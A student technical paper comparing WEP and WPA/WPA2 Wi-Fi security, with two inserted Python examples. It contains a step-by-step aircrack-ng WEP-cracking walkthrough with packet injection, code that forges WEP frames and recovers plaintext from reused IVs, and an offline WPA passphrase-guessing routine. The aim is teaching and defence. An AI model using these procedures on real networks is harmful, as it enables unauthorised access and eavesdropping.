Sulabh Khanal (09289394)

Wireless Security Technologies: WEP vs WPA/WPA2

Table of Contents

ABSTRACT
INTRODUCTION TO WLAN
WLAN COMPONENTS
    Access Points
    Network Interface Cards (NICs)/client adapters
    Antennae
SECURITY THREATS OF WLAN
    Spoofing and Session Hijacking
    Rogue Access Points
    Denial of Service
    Eavesdropping
    Man-in-the-Middle Attack
    War Driving
    Wireless Network Sniffers
    Jamming
WLAN SECURITY TECHNOLOGIES
    Wired Equivalent Privacy (WEP)
        Working of WEP
        WEP vulnerabilities
        Cracking WEP
    Wi-Fi Protected Access (WPA/WPA2)
        Basic working of WPA/WPA2
        Working of WPA-TKIP
        Working of WPA2-AES
WPA/WPA2 SECURITY ADVANTAGE OVER WEP
CONCLUSION
REFERENCES

ABSTRACT

Wireless technology has become part of daily life, and a wireless router is installed in nearly every home today.
Most of these routers are left in their default, out-of-the-box configuration, and only some of them use a genuinely strong encryption scheme on the wireless network. As a result there have been many cases of unauthorised access to WLANs. Simply switching on wireless encryption is not enough: knowing which technology provides the best protection matters, so that attackers are kept from unauthorised access. This technical paper gives an overview of wireless security threats and compares the underlying wireless security technologies.

INTRODUCTION TO WLAN

A wireless local area network (WLAN) is a flexible data communications system that provides network communication over short distances using radio or infrared signals. The first WLAN standard, IEEE 802.11, was ratified in 1997. WLANs are now widely used in many sectors, ranging from corporate, education and finance to healthcare, retail, manufacturing and warehousing. A WLAN is easier to install than a wired network, which requires considerable cabling effort. The common IEEE 802.11 WLAN specifications are:
- IEEE 802.11: the original specification, operating in the 2.4 GHz range and delivering 1 to 2 Mbit/s using phase-shift keying (PSK) modulation; this PSK is a modulation scheme, not the pre-shared key used by WPA later in this paper. It is no longer used and has been replaced by later amendments.
- IEEE 802.11a: operates in the 5 GHz band with a maximum raw data rate of 54 Mbit/s, using OFDM (Orthogonal Frequency Division Multiplexing). Because it uses a higher frequency band, its range is relatively short.
- IEEE 802.11b: operates in the 2.4 GHz band with a maximum raw data rate of 11 Mbit/s. It has a longer range than 802.11a since it operates in a lower frequency band.
- IEEE 802.11g: operates in the 2.4 GHz band, uses OFDM and has a maximum raw data rate of 54 Mbit/s. 802.11g hardware is backward compatible with 802.11b hardware.
- IEEE 802.11n: operates in either the 2.4 GHz or the 5 GHz band and has a maximum raw data rate of 600 Mbit/s, a significant improvement. It uses a wider 40 MHz channel together with MIMO (Multiple Input Multiple Output) and spatial division multiplexing (SDM).

WLAN COMPONENTS

One important advantage of a WLAN is the simplicity of its installation: it eliminates the need to pull cable through walls and ceilings. The physical architecture is also simple. The basic components of a WLAN are access points (APs) and network interface cards (NICs)/client adapters.

Access Points

An access point (AP) is essentially the wireless equivalent of a LAN hub. It is typically connected to the wired backbone through a standard Ethernet cable and communicates with wireless devices by means of an antenna. An AP operates within a specific frequency band and uses the modulation techniques specified by the 802.11 standard. It also announces its availability to wireless clients (beacons), and authenticates and associates wireless clients to the wireless network.

Network Interface Cards (NICs)/client adapters

Wireless client adapters connect a PC or workstation to a wireless network, either in ad hoc (peer-to-peer) mode or in infrastructure mode through an AP. They are available as PCMCIA (Personal Computer Memory Card International Association) cards and PCI (Peripheral Component Interconnect) cards and connect desktop and mobile computing devices wirelessly to all network resources. The NIC scans the available frequency spectrum for connectivity and associates with an access point or another wireless client.
The NIC lets users connect to the network instantly.

Antennae

Wireless transmission requires antennas at both sender and receiver. The choice of antenna can affect the functionality of a WLAN dramatically. An antenna does not increase the transmit power; it focuses the signal in a particular direction to improve reception. Proper antenna installation is therefore crucial for a WLAN, and it also determines how far the signal leaks beyond the intended coverage area.

SECURITY THREATS OF WLAN

Despite the productivity, convenience and cost advantages that a WLAN offers, the radio waves it uses create a risk: anyone in range can receive from and transmit on the medium. This section explains threats such as denial of service, spoofing, eavesdropping and others.

Spoofing and Session Hijacking

Here the attacker gains access to privileged data and resources by faking the identity of a valid user. This is possible because 802.11 does not authenticate the source address of frames, the MAC (Medium Access Control) address. Attackers can therefore spoof MAC addresses and hijack active wireless sessions.

Rogue Access Points

Attackers may set up rogue access points with an SSID (Service Set Identifier) similar or identical to that of the legitimate AP. Users may accidentally or unknowingly connect to such a rogue AP, compromising the confidentiality of their traffic. Proper authentication and access control, in which the client also verifies the network and not only the other way round, are needed to eliminate this kind of spoofing.

Denial of Service

In this kind of attack the intruder floods the network with valid or invalid messages, affecting the availability of network resources. Because of the nature of radio transmission, WLANs are very vulnerable to denial of service: their relatively low bit rates can easily be overwhelmed, and with a powerful enough transmitter an attacker can generate radio interference that prevents the WLAN from communicating at all.

Eavesdropping

This is an attack on the confidentiality of data being transmitted across the network. By their nature, wireless LANs radiate network traffic into space, which makes it impossible to control who receives the signal. Eavesdropping is the most significant wireless threat because the attacker can intercept the transmission over the air from a distance, away from the premises, without ever touching the network.

Man-in-the-Middle Attack

In impersonation or man-in-the-middle attacks, devices can be impersonated even when the data itself is protected. This can lead to availability attacks or to the capture of data the victim did not intend to send through the attacker, which in turn may give the attacker the material needed to crack the encryption.

War Driving

War driving is an attack in which the attacker moves around in a vehicle and probes for open wireless networks using a portable computer. Software such as Kismet, KisMAC and NetStumbler is readily available and is used by attackers to identify and gain unauthorised access to open wireless networks.

Wireless Network Sniffers

Wireless network sniffers such as Ettercap, AirScanner and Wireshark are used by attackers to locate access points. These sniffers not only detect access points but also capture and analyse packets travelling through the wireless network, which is the starting point of the WEP attack described later.

Jamming

Because wireless technology operates in the radio frequency spectrum, transmissions that overlap on the same frequency cause interference. Intentional interference of this type is called jamming. Jamming the wireless channel can force WLAN users to disconnect from their access points, so attackers use it as a form of denial of service.
WLAN SECURITY TECHNOLOGIES

Wired Equivalent Privacy (WEP)

Wired Equivalent Privacy (WEP) is the encryption scheme defined in the original IEEE 802.11 standard for wireless networking. It was intended to provide both user authentication and data encryption. WEP protects a WLAN by encrypting the information transmitted over the air, so that only receivers holding the correct key can decrypt it; the same key is also used (in shared-key authentication) to authenticate authorised users and grant them access to the wireless network.

Working of WEP

WEP uses a pre-established shared secret called the base key, the RC4 stream cipher and the CRC-32 (Cyclic Redundancy Code) checksum algorithm. WEP supports up to four base keys, identified by Key IDs 0 to 3. Each of these is a group key, called a default key, shared among all members of a specific wireless network.

WEP operates on MAC Protocol Data Units (MPDUs). To protect the data in an MPDU, WEP first computes an integrity check value (ICV), the CRC-32 of the plaintext data, and appends it to the data to (supposedly) ensure integrity. WEP then selects a base key and a 24-bit initialization vector (IV) and forms the per-packet RC4 key by concatenating the IV and the selected base key (IV || base key; there is no XOR or hashing step). RC4 is seeded with this per-packet key, and the resulting key stream is XORed with the data and the ICV to produce the ciphertext. The IV and the Key ID of the selected key are encoded as a four-byte header (three IV bytes and one byte carrying the Key ID in its top two bits) and prepended in the clear to the encrypted data.

Fig: Basic WEP Encryption

A basic WEP base key is 40 bits long, so the per-packet key is 64 bits once the IV is included. Many products also support a 104-bit base key, giving a 128-bit per-packet key. The larger key does not make WEP materially more secure, because the attacks described below exploit the IV handling, the RC4 key schedule and the linear CRC-32, not the key length.
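The encapsulation just described, together with two of the consequences examined in the next section (key-stream reuse under a repeated IV, and forgery through the linear CRC-32 ICV), as an added Python example. This is not code from the paper or from Aircrack-ng; it is a toy implementation that mirrors the WEP frame format (3-byte IV, Key ID byte, RC4 keyed with IV || base key, little-endian CRC-32 ICV). The 40-bit key is the one recovered in the cracking walk-through below; the IV and the two messages are constructed for the demonstration.

```python
"""Toy WEP encapsulation (RC4 with IV || key, CRC-32 ICV) and two key-free attacks on it."""
import math
import struct
import zlib


def rc4_keystream(key: bytes, length: int) -> bytes:
    """Return `length` bytes of RC4 key stream for `key` (KSA followed by PRGA)."""
    s = list(range(256))
    j = 0
    for i in range(256):                       # key-scheduling algorithm
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):                    # pseudo-random generation algorithm
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor_bytes(a: bytes, b: bytes) -> bytes:
    """XOR two byte strings; the result is as long as the shorter input."""
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encapsulate(base_key: bytes, iv: bytes, key_id: int, data: bytes) -> bytes:
    """Sender side: IV header || RC4(IV || base_key) XOR (data || CRC-32 ICV)."""
    assert len(iv) == 3 and 0 <= key_id <= 3
    icv = struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF)   # ICV is little-endian in 802.11
    keystream = rc4_keystream(iv + base_key, len(data) + 4)  # per-packet key is IV || base key
    header = iv + bytes([key_id << 6])                        # Key ID lives in the top two bits of byte 3
    return header + xor_bytes(data + icv, keystream)


def wep_decapsulate(base_key: bytes, frame: bytes):
    """Receiver side: decrypt and check the ICV; returns the data, or None if the ICV fails."""
    iv, body = frame[:3], frame[4:]
    plain = xor_bytes(body, rc4_keystream(iv + base_key, len(body)))
    data, icv = plain[:-4], plain[-4:]
    if struct.unpack("<I", icv)[0] != (zlib.crc32(data) & 0xFFFFFFFF):
        return None
    return data


def forge_bit_flip(frame: bytes, offset: int, delta: bytes) -> bytes:
    """Attacker side, no key needed: XOR `delta` into the plaintext at `offset` and fix the ICV.

    CRC-32 is affine, so crc(p ^ d) == crc(p) ^ crc(d) ^ crc(zeros of the same length).
    Both correction terms are computable without the key, so the receiver's ICV check passes.
    """
    body = frame[4:]
    data_len = len(body) - 4
    d = bytearray(data_len)
    d[offset:offset + len(delta)] = delta
    icv_delta = (zlib.crc32(bytes(d)) ^ zlib.crc32(bytes(data_len))) & 0xFFFFFFFF
    return frame[:4] + xor_bytes(body, bytes(d) + struct.pack("<I", icv_delta))


def recover_by_keystream_reuse(frame_a: bytes, frame_b: bytes, known_plain_a: bytes) -> bytes:
    """Attacker side: two frames under the same IV share a key stream, so
    c_a ^ c_b == p_a ^ p_b and a known p_a reveals p_b."""
    assert frame_a[:3] == frame_b[:3], "different IVs: no key-stream reuse"
    return xor_bytes(xor_bytes(frame_a[4:], frame_b[4:]), known_plain_a)


def iv_collision_probability(frames: int, iv_bits: int = 24) -> float:
    """Birthday-bound probability that at least two of `frames` random IVs coincide."""
    return 1.0 - math.exp(-frames * (frames - 1) / (2.0 * 2 ** iv_bits))


# Constructed sample data: the 40-bit key is the one the aircrack-ng run below recovers;
# the IV and the messages are made up for this example.
BASE_KEY = bytes.fromhex("0561931820")
IV = bytes.fromhex("0a0b0c")
MSG_A = b"PAY 1000 TO BOB"
MSG_B = b"PAY 0500 TO EVE"

if __name__ == "__main__":
    frame_a = wep_encapsulate(BASE_KEY, IV, 0, MSG_A)
    forged = forge_bit_flip(frame_a, 4, xor_bytes(b"1000", b"9999"))
    print("forged frame decrypts to:", wep_decapsulate(BASE_KEY, forged))
    frame_b = wep_encapsulate(BASE_KEY, IV, 0, MSG_B)
    print("recovered via IV reuse:", recover_by_keystream_reuse(frame_a, frame_b, MSG_A))
    print("P(IV collision) after 10,000 frames: %.2f" % iv_collision_probability(10_000))
```

The forged frame passes the receiver's ICV check with the amount changed, even though the attacker never learns the key, and the second frame under the same IV is recovered from the first with one XOR. The collision estimate shows why a 24-bit IV is far too small: after about 10,000 frames a repeat is more likely than not.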
WEP vulnerabilities

WEP has the following weaknesses, which make it highly susceptible to attack:

The initialization vector (IV) is too small. WEP feeds the IV together with the WEP key into the RC4 pseudo-random number generator (PRNG), which produces the key stream used to encrypt the 802.11 frame payload. With only 24 bits of IV there are 16,777,216 possible key streams per key; a busy AP exhausts them in hours, and by the birthday bound a repeat is expected after only about 5,000 frames. Two frames encrypted with the same IV and key share a key stream, so XORing the two ciphertexts yields the XOR of the two plaintexts, and any known plaintext in one reveals the other. Many implementations also reset the IV to zero and count upwards, which makes collisions even more frequent.

Uses the master key rather than a derived key. The WEP key, whether configured manually or delivered through 802.1X authentication, is the only keying material; it is the master key and is used directly to encrypt data. Encrypting with the master key is less secure than encrypting with keys derived from it, since every recovered key stream directly exposes the long-term secret. In addition, simply prepending the IV to the key exposes RC4's weak key schedule (the FMS attack and its PTW successor), so the key itself can be recovered from a few tens of thousands of captured frames.

Weak data integrity. WEP integrity consists of computing the CRC-32 checksum over the unencrypted 802.11 payload and encrypting that value along with the payload. CRC-32 is linear, so even without the key an attacker can flip bits in the encrypted payload and update the encrypted CRC-32 accordingly, and the receiver cannot tell that the frame was modified.

No replay protection. WEP provides no protection against replay attacks, in which an attacker retransmits previously captured frames to gain access or modify data. The aireplay-ng steps below rely on exactly this.

No rekeying. WEP provides no mechanism to refresh the encryption keys; in practice the same key stays in use for months or years.

Cracking WEP

By taking advantage of the weaknesses above, attackers have found numerous ways to gain access, and there are now many tools that recover WEP keys automatically. Utilities such as Aircrack-ng and AirSnort make cracking a WEP key straightforward.

WEP can be cracked very easily using BackTrack Linux 3 or later, which ships Aircrack-ng. All that is needed is a computer running BackTrack with a wireless adapter capable of monitor mode and packet injection. The following steps and commands show how simply WEP can be cracked.

- Boot BackTrack Linux and open a Konsole (terminal).
- Type 'airmon-ng' to list the wireless interfaces ('airmon-ng start wlan0' puts the chosen interface into monitor mode).
- Type 'airodump-ng wlan0' to scan for wireless networks, where 'wlan0' is the wireless interface name.
- Several wireless networks are listed. Select a WEP network to crack and note its BSSID, channel number and ESSID.
- Type 'airodump-ng -w wep -c 11 --bssid 00:90:D0:EF:B4:10 wlan0' to start collecting WEP packets. Here '-w wep' writes the captured packets to files with the prefix 'wep', '-c 11' is the channel of the target AP, '--bssid 00:90:D0:EF:B4:10' is the MAC address/BSSID of the AP and 'wlan0' is the interface to capture on. The screen shows the number of data frames (distinct IVs) collected so far.
- To speed up data collection, open another terminal and type 'aireplay-ng -1 0 -a 00:90:D0:EF:B4:10 wlan0' to send authentication and association requests to the AP (fake authentication). Here '-1' selects the fake-authentication attack, '0' is the delay in seconds between attempts, '-a 00:90:D0:EF:B4:10' is the BSSID of the AP and 'wlan0' is the wireless interface. The AP must accept the association before injection will work.
- Now packets have to be injected. Type 'aireplay-ng -3 -b 00:90:D0:EF:B4:10 wlan0'.
Here '-3' selects the ARP request replay attack: aireplay-ng waits for an ARP request from a legitimate client and then replays it repeatedly; because WEP has no replay protection the AP accepts every copy and answers each with a new frame under a new IV, which rapidly increases the number of unique IVs captured. '-b 00:90:D0:EF:B4:10' is the BSSID of the AP and 'wlan0' is the wireless interface.
- After enough packets have been captured (tens of thousands of IVs for a 104-bit key, far fewer for a 40-bit one), open another terminal and type 'aircrack-ng wep-01.cap' to start cracking the WEP key. Here 'wep-01.cap' is the capture file written by airodump-ng. After a short while the key is recovered; in this case it is '0561931820' (a 40-bit key given as ten hexadecimal digits).

Wi-Fi Protected Access (WPA/WPA2)

WPA is a wireless security technology that replaces WEP with a stronger encryption scheme, the Temporal Key Integrity Protocol (TKIP) with a Message Integrity Check (MIC), while still running on WEP-era hardware. It provides mutual authentication using either the Extensible Authentication Protocol (EAP) over 802.1X or a pre-shared key (PSK).

WPA2 is the Wi-Fi Alliance's certified interoperable implementation of the full IEEE 802.11i specification, launched in September 2004. Like WPA, WPA2 supports IEEE 802.1X/EAP authentication or a PSK. It adds a new encryption mechanism, the Counter-Mode/CBC-MAC Protocol (CCMP), which is built on the Advanced Encryption Standard (AES) block cipher.

Basic working of WPA/WPA2

WPA and WPA2 authentication begins when a client associates with an access point. The AP blocks access to the network until the client has been authenticated. In enterprise mode the client presents credentials, which are relayed through the AP to an authentication server (typically RADIUS) using the IEEE 802.1X/EAP framework. With EAP, IEEE 802.1X provides a framework in which the client and the authentication server mutually authenticate through the AP. Mutual authentication ensures that only authorised users join the network and that the client is talking to a legitimate server rather than a rogue AP.

If the authentication server accepts the credentials, the client is admitted to the WLAN; otherwise it remains blocked. Once the user has been authenticated, the authentication server and the client independently derive the same Pairwise Master Key (PMK), and the server passes it to the AP. In personal (PSK) mode there is no server: the PMK is the pre-shared key itself, derived on both sides from the passphrase and the SSID. A 4-way handshake then takes place between the client and the AP. It proves to each side that the other holds the PMK, establishes and installs fresh TKIP (WPA) or AES-CCMP (WPA2) temporal keys, and is itself protected by a MIC keyed from the derived keys. As the client begins communicating on the LAN, these temporal keys protect the data exchanged between client and AP.

Working of WPA-TKIP

WPA addresses the weaknesses of WEP with the dynamic encryption provided by TKIP. TKIP replaces WEP's small (40-bit) static key, entered manually on APs and clients, with a 128-bit temporal key that is mixed into a fresh per-packet key for every frame. WPA generates keys dynamically and so removes the predictability that intruders rely on to exploit the WEP key. WPA also includes a Message Integrity Check (MIC, the Michael algorithm) designed to stop an attacker capturing, altering and resending frames.

WPA operates at the Media Access Control (MAC) layer. After accepting a user's credentials, the authentication server uses 802.1X to deliver a unique master, or pairwise, key for that user session. TKIP then distributes keying material to the client and AP, setting up a key hierarchy and management system, and generates a unique key to encrypt every data frame sent during the session. This hierarchy replaces WEP's single static key with 2^48 (about 281 trillion) distinct per-packet keys for a given temporal key, one for each value of the 48-bit sequence counter. The MIC is what prevents an attacker from capturing, altering and resending frames: the transmitter computes the MIC over the frame with a dedicated MIC key, the receiver recomputes it, and the two values are compared.
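The key hierarchy described above, worked through as an added Python example (not code from the paper, the Wi-Fi Alliance or any supplicant): the PSK/PMK derivation of WPA-Personal, the PTK derivation of the 4-way handshake with the IEEE 802.11i PRF, and the EAPOL-Key MIC that authenticates handshake message 2. The SSID, passphrase, client MAC and nonces are constructed; the AP MAC reuses the BSSID from the capture above. The EAPOL-Key frame layout follows IEEE 802.11i, with the 16-byte MIC field at byte offset 81. The last function is the check a practitioner wants: anyone who captures one handshake can recompute this MIC for passphrase guesses offline, so WPA-Personal is only as strong as its passphrase.

```python
"""WPA/WPA2 key hierarchy: passphrase -> PMK, 4-way-handshake PTK derivation with the
IEEE 802.11i PRF, and the EAPOL-Key MIC that authenticates the handshake messages."""
import hashlib
import hmac

MIC_OFFSET = 81  # byte offset of the 16-byte Key MIC field inside an EAPOL-Key frame


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """WPA-Personal: PMK = PSK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """IEEE 802.11i PRF-n: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0, 1, ..., truncated to n bytes."""
    out = b""
    for i in range((nbytes + 19) // 20):
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:nbytes]


def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> dict:
    """PTK = PRF-512(PMK, "Pairwise key expansion", min(AA,SPA)||max(AA,SPA)||min(ANonce,SNonce)||max(...)).
    KCK protects the handshake, KEK wraps the group key, TK encrypts data; CCMP uses only the first 48 bytes."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    ptk = prf(pmk, b"Pairwise key expansion", data, 64)
    return {"kck": ptk[:16], "kek": ptk[16:32], "tk": ptk[32:48], "tkip_mic_keys": ptk[48:64]}


def build_eapol_msg2(snonce: bytes, replay_counter: int) -> bytes:
    """Constructed EAPOL-Key message 2 (client -> AP) with the MIC field zeroed.
    Key Information 0x010A = descriptor version 2 (HMAC-SHA1-128, AES key wrap), Pairwise, MIC present."""
    body = b"\x02" + (0x010A).to_bytes(2, "big") + (0).to_bytes(2, "big") + replay_counter.to_bytes(8, "big")
    body += snonce + bytes(16) + bytes(8) + bytes(8) + bytes(16) + (0).to_bytes(2, "big")
    return b"\x02\x03" + len(body).to_bytes(2, "big") + body   # EAPOL version 2, type 3 (EAPOL-Key)


def eapol_mic(kck: bytes, frame: bytes, cipher: str = "ccmp") -> bytes:
    """MIC over the whole EAPOL frame with the MIC field zeroed: HMAC-SHA1 truncated to 16 bytes for
    WPA2/CCMP, HMAC-MD5 for WPA/TKIP. Only a holder of the KCK (hence of the PMK) can produce it."""
    zeroed = frame[:MIC_OFFSET] + bytes(16) + frame[MIC_OFFSET + 16:]
    digest = hashlib.sha1 if cipher == "ccmp" else hashlib.md5
    return hmac.new(kck, zeroed, digest).digest()[:16]


def sign_msg2(kck: bytes, frame: bytes) -> bytes:
    """Client side: fill in the MIC field."""
    return frame[:MIC_OFFSET] + eapol_mic(kck, frame) + frame[MIC_OFFSET + 16:]


def verify_msg2(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes, frame: bytes) -> bool:
    """AP side: recompute the MIC from its own PTK and compare in constant time."""
    kck = derive_ptk(pmk, aa, spa, anonce, snonce)["kck"]
    return hmac.compare_digest(eapol_mic(kck, frame), frame[MIC_OFFSET:MIC_OFFSET + 16])


def offline_guess(candidates, ssid, aa, spa, anonce, snonce, frame):
    """What an eavesdropper holding one captured handshake can do: test passphrases offline.
    The 4096 PBKDF2 rounds slow each guess down, but only a strong passphrase stops this."""
    for guess in candidates:
        if verify_msg2(pmk_from_passphrase(guess, ssid), aa, spa, anonce, snonce, frame):
            return guess
    return None


# Constructed sample parameters: the AP MAC is the BSSID from the capture above; the rest is made up.
SSID = "ExampleNet"
PASSPHRASE = "correct horse battery staple"
AA = bytes.fromhex("0090d0efb410")
SPA = bytes.fromhex("001122334455")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))

if __name__ == "__main__":
    pmk = pmk_from_passphrase(PASSPHRASE, SSID)
    keys = derive_ptk(pmk, AA, SPA, ANONCE, SNONCE)
    msg2 = sign_msg2(keys["kck"], build_eapol_msg2(SNONCE, 1))
    print("PMK:", pmk.hex())
    print("TK used for data (never the PMK itself):", keys["tk"].hex())
    print("AP accepts message 2:", verify_msg2(pmk, AA, SPA, ANONCE, SNONCE, msg2))
    print("offline guessing finds:", offline_guess(["password", "letmein", PASSPHRASE],
                                                  SSID, AA, SPA, ANONCE, SNONCE, msg2))
```

Two points the paper's prose does not show: the data key (TK) is a fresh derivative of the PMK and the two nonces, so the master key never touches a data frame; and because the derivation is entirely deterministic from public handshake fields plus the PMK, a captured handshake is a self-contained oracle for offline passphrase guessing.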
When the MICs do not match, the frame is assumed to have been tampered with and is dropped. Because Michael is deliberately weak (it had to run on WEP-era hardware), TKIP adds countermeasures: if two MIC failures are observed within 60 seconds, the AP and the client station stop using the current keys, deauthenticate all TKIP clients and refuse new associations for 60 seconds, after which fresh keys are negotiated.

The countermeasures themselves create an observable signal, and this is where TKIP is vulnerable. The TKIP attack published by Beck and Tews in 2008 uses a mechanism similar to the WEP chopchop attack to decode a frame one byte at a time, replaying modified frames and watching the air for the MIC-failure report. The attacker waits 60 seconds after each MIC failure to avoid triggering the countermeasures, so decoding proceeds at about one byte per minute; a small frame such as an ARP (Address Resolution Protocol) packet can typically be decoded in about 12 to 15 minutes. Once a TKIP frame has been decoded, the attacker knows its key stream and the MIC key and can inject up to 15 further arbitrary frames, one per unused QoS queue (each queue has its own replay counter), without triggering the sequence-number check that would otherwise drop the injected frame. This enables ARP poisoning, DNS manipulation and denial of service against clients. The attack requires QoS (802.11e) to be enabled, works only on frames sent from the AP to the client, and recovers no encryption key, so it is still difficult to crack WPA-TKIP in the sense of reading arbitrary traffic: it takes a lot of time and needs a busy network. It does show that TKIP is a stopgap and that CCMP should be used wherever the hardware supports it.

Working of WPA2-AES

AES is a block cipher, a symmetric-key cipher that operates on groups of bits of a fixed length called blocks. A symmetric-key cipher uses the same key for both encryption and decryption, and the word cipher denotes the algorithm used to encrypt and decrypt information. With AES, plaintext is processed block by block rather than by a key stream running across a stream of plaintext as in RC4. AES has a block size of 128 bits and three possible key lengths, 128, 192 and 256 bits, as specified in the AES standard; WPA2/802.11i uses a 128-bit key. One AES round consists of four stages, and the round is iterated 10, 12 or 14 times depending on key size; with the 128-bit key used by WPA2 there are 10 rounds.

WPA2 uses AES in the Counter-Mode/CBC-MAC Protocol (CCMP). CCM is a mode of operation that lets a single key provide both encryption and authentication. Its two underlying modes are Counter mode (CTR), which encrypts the data, and Cipher Block Chaining Message Authentication Code (CBC-MAC), which provides integrity over both the payload and the unencrypted header fields. The MIC is produced by the same cipher and key as the encryption, unlike earlier designs (WEP's CRC-32, TKIP's Michael) that need a separate integrity algorithm. In place of WEP's 24-bit IV, CCMP carries a 48-bit packet number (PN) in each frame; it is incremented for every frame, must never repeat under the same temporal key, and also serves as the replay counter.

No practical attack on AES is known; current analysis puts the best attacks on the order of 2^120 operations, far beyond any feasible computation, so the cipher itself is not the weak point of WPA2. WPA2 does, however, require hardware with AES support. Older equipment that cannot do AES can only be upgraded to WPA-TKIP and eventually has to be replaced.

WPA/WPA2 SECURITY ADVANTAGE OVER WEP

Compared with the original IEEE 802.11 security mechanism, 40-bit WEP with no dynamic keying, TKIP and AES-CCMP make it far more difficult, if not practically impossible, for an intruder to break into a Wi-Fi network.
By greatly expanding the size and number of keys in use, adding a real integrity check, using a strong cipher and imposing replay protection, TKIP and AES-CCMP greatly increase the strength of wireless encryption. Together with the IEEE 802.1X/EAP mutual authentication framework, they make decoding data on a Wi-Fi network far harder than before. WPA/WPA2 have the following advantages over WEP:
- The 24-bit IV is replaced by a 48-bit sequence counter (the TKIP sequence counter, TSC, or the CCMP packet number), giving 2^48, about 281 trillion, per-packet keys before a rollover; rekeying happens long before that.
- The TSC/PN is monotonically increasing and checked by the receiver, which both prevents reuse of per-packet keys and provides replay protection.
- WPA2 uses AES-CCMP, providing stronger encryption and a cryptographic integrity check.
- Every frame sent over the air is encrypted with a unique key, so key streams are never reused.
- Master keys are never used directly; temporal keys are derived from them in the 4-way handshake.
- WPA2 authenticates in two phases: first open-system 802.11 authentication, then 802.1X with an Extensible Authentication Protocol (EAP) method. For small office/home office (SOHO) networks without a Remote Authentication Dial-In User Service (RADIUS) server, WPA2 Personal supports a pre-shared key (PSK) instead.
- WPA/WPA2 rekey automatically to derive new sets of temporal keys.
These advantages should discourage anyone from still using WEP as the security solution for a wireless LAN.

CONCLUSION

This report has discussed WLAN vulnerabilities and compared the available wireless security technologies. To maintain confidentiality, integrity and privacy, stronger security technology has to be used.

Wired Equivalent Privacy (WEP) is the least secure option: it has many vulnerabilities and poses a real risk to any wireless network that still uses it. With their stronger encryption, secure authentication and robust key management, WPA and especially WPA2 can be considered the most secure wireless technologies to date. Each technology has its own advantages and disadvantages in deployment; the more advanced the technology the more secure it becomes, but deployment complexity also increases. Besides implementing a secure wireless technology, simple measures such as turning off SSID broadcasting, using static IP addresses, deploying firewalls and a VPN (Virtual Private Network), and limiting radio propagation into non-user areas by positioning the AP antennae properly can further improve WLAN security, although SSID hiding and static addressing only raise the effort for a casual attacker and are no substitute for strong encryption. The defences against wireless attacks have certainly improved over the past several years, but the effort to stay ahead must continue. The comparison of WEP and WPA/WPA2 shows that the technology is moving in the right direction, but it should never stay stagnant for long. Wireless transmission will not disappear in the near future; rather, the technology will keep being enhanced. The answer is to stay ahead of it, ward off attackers and provide a secure environment for data transmission.

REFERENCES

1. Symantec (2002). Wireless LAN Security: Enabling and Protecting the Enterprise [online]. Available from: http://www.symantec.com/avcenter/reference/symantec.wlan.security.pdf [Accessed: 20th January 2010]
2. Wi-Fi Alliance (2003). Wi-Fi Protected Access: Strong, standards-based, interoperable security for Wi-Fi networks [online]. Available from: http://www.trentu.ca/admin/it/airtrent/WPA.pdf [Accessed: 5th February 2010]
3. Internet Security Systems (2001). Wireless LAN Security: 802.11b and Corporate Networks [online]. Available from: http://documents.iss.net/whitepapers/wireless_LAN_security.pdf [Accessed: 9th February 2010]
4. Wikipedia (2009). Wireless LAN Security [online]. Available from: http://en.wikipedia.org/wiki/Wireless_LAN_security [Accessed: 10th February 2010]
5. Wikipedia (2010). Wi-Fi Protected Access [online]. Available from: http://en.wikipedia.org/wiki/Wi-Fi_Protected_Access [Accessed: 9th February 2010]
6. BackTrack Linux (2010). Index Page [online]. Available from: http://www.backtrack-linux.org/ [Accessed: 5th February 2010]
7. Ou, G. (2005). Understanding the updated WPA and WPA2 standards [online]. Available from: http://blogs.zdnet.com/Ou/?p=67 [Accessed: 5th February 2010]
8. Dlaverty (2009). WPA vs WEP: How your Choice Affects your Wireless Network Security [online]. Available from: http://www.openxtra.co.uk/articles/wpa-vs-wep [Accessed: 5th February 2010]
9. Aircrack-ng (2009). Tutorials [online]. Available from: http://www.aircrack-ng.org/doku.php?id=tutorial [Accessed: 8th February 2010]